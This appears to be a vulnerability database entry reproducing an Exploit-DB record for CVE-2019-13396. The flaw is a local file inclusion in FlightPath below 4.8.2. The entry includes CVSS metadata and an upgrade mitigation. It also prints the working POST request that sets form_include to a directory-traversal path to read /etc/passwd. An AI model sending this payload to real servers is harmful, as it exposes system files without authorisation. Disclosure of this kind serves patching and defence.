FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion

vendor:

FlightPath

by:

Mohammed Althibyani

5.3

CVSS

MEDIUM

Local File Inclusion

CWE

Product Name: FlightPath

Affected Version From: < 4.8.2

Affected Version To: < 5.0-rc2

Patch Exists: YES

Related CWE: CVE-2019-13396

CPE: a:flightpath:flightpath

Metasploit:

Other Scripts:

Tags: cve,cve2019,flightpath,lfi,edb

CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Nuclei References: https://www.exploit-db.com/exploits/47121, http://getflightpath.com/node/2650, https://nvd.nist.gov/vuln/detail/CVE-2019-13396

Nuclei Metadata: {'max-request': 2, 'vendor': 'getflightpath', 'product': 'flightpath'}

Platforms Tested: Kali Linux

2019

FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion

This exploit allows an attacker to include arbitrary local files on the server by modifying the 'include_form' parameter in a POST request. By manipulating the 'form_include' parameter, an attacker can traverse directories and access sensitive files on the server, such as /etc/passwd.

Mitigation:

To mitigate this vulnerability, it is recommended to update FlightPath to version 4.8.2 or higher.

Source

Exploit-DB raw data:

# Exploit Title: FlightPath < 4.8.2 & < 5.0-rc2 - Local File Inclusion
# Date: 07-07-2019
# Exploit Author: Mohammed Althibyani
# Vendor Homepage: http://getflightpath.com
# Software Link: http://getflightpath.com/project/9/releases
# Version: < 4.8.2 & < 5.0-rc2
# Tested on: Kali Linux
# CVE : CVE-2019-13396


# Parameters : include_form
# POST Method:

use the login form to get right form_token [ you can use wrong user/pass ]

This is how to POST looks like:

POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_type=&form_path=login&form_params=YTowOnt9&form_include=&default_redirect_path=login&default_redirect_query=current_student_id%3D%26advising_student_id%3D&current_student_id=&user=test&password=test&btn_submit=Login


# modfiy the POST request to be:


POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1

callback=system_login_form&form_token=fb7c9d22c839e3fb5fa93fe383b30c9b&form_include=../../../../../../../../../etc/passwd




# Greats To : Ryan Saaty, Mohammed Al-Howsa & Haboob Team.